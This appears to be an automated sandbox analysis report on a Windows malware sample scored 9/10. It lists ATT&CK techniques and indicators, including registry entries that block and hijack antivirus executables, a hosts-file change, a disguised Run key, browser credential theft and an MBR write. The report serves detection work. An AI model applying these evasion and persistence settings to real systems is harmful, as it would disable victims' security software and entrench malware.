1d1732c1f40085db43ea9b1e377ca70c2b2572938982234d9a6c3240b538fee4

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
23-08-2024 05:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Size

2.3MB
MD5

ba92222c0e5c25c531e322148d5ac011
SHA1

dd5b00d68c1fbc9fbf6acf42fb85210f9dc71c8c
SHA256

1d1732c1f40085db43ea9b1e377ca70c2b2572938982234d9a6c3240b538fee4
SHA512

c7886c000f614dd2fef9b45556bfaeaa851762684f780729beb50628a3107f1c3d1d73b6275f7d3ba11c5990786229ff6afc811f2277fb8ecf27178fa7ccf91f
SSDEEP

49152:F0Q5Ujw6tkkcq428htQPOL2XmGs3hfFeWmu3rWrHGn9LvH8nLwPlC/v3:BiE6OzqehtQ+ThdN7YHGn976wPl6v3

Score

9^/10

bootkit discovery evasion persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe

Blocks application from running via registry modification 18 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "avcenter.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "avgcmgr.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "avgwdsvc.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "avscan.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "avgscanx.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "avgemc.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "MSASCui.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "ekrn.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "avgfrw.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\0 = "msseces.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "egui.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "avgnt.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "avgui.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "avgtray.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "avgcfgex.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "avgchsvx.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe

Drops file in Drivers directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\host_new	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File created	C:\Windows\System32\drivers\etc\hosts	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\moolive.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lockdown.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lnetinfo.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lookout.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oasrv.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcc32.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ldpro.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\minilog.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\~2.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rrguard.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\webtrap.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smrtdefp.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\blink.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wupdt.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PsCtrls.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fih32.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\panixk.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jedi.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mfw2en.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mgavrte.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nwinst4.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\realmon.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SafetyKeeper.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswRegSvr.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avkwctl9.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tbscan.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsstat.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vir-help.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\win32us.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wupdater.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavprsrv.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lucomserver.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sahagent.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avkservice.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\borg2.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchosts.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbwin9x.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntispywarXP2009.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ave32.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpupd.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SecuritySoldier.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cssurf.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avsched32.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nisserv.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\npfmessenger.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tfak5.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bvt.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hwpe.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navstub.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavproxy.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sysupd.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tvtmd.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install[3].exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oaview.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcshell.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vswin9xe.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\frmwrk32.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sahagent.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wintsk32.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winservn.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OAcat.exe	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\htpatch.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ldpromenu.exe\Debugger = "svchost.exe"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1604-0-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-3-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-5-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-4-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-267-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-266-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-277-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-272-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-269-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-284-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-268-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-285-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-286-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-310-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-390-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-388-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-392-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-341-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-338-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-333-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-313-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-389-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-373-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-308-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-307-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-404-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-422-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-453-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-455-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-459-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-456-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-458-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-460-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-461-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-463-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-462-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-464-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-465-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-466-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-536-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-537-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-538-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-636-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-637-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-639-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-643-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-653-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-652-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-655-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-650-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-648-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-645-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-646-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-649-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-657-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-658-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-659-0x0000000013140000-0x000000001372E000-memory.dmp	upx
behavioral2/memory/1604-660-0x0000000013140000-0x000000001372E000-memory.dmp	upx

Unexpected DNS network traffic destination 36 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.220.220
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PC Security Guardian = "\"C:\\ProgramData\\a40fb\\PS132.exe\" /s /d"	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Eset\Nod\	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 21 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\L:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\M:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\W:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\X:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\Z:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\G:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\H:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\J:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\O:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\Q:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\T:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\V:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\Y:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\E:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\P:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\N:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\K:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\R:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\S:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\U:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe
File opened (read-only)	\??\I:	ba92222c0e5c25c531e322148d5ac011_JaffaCakes118.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
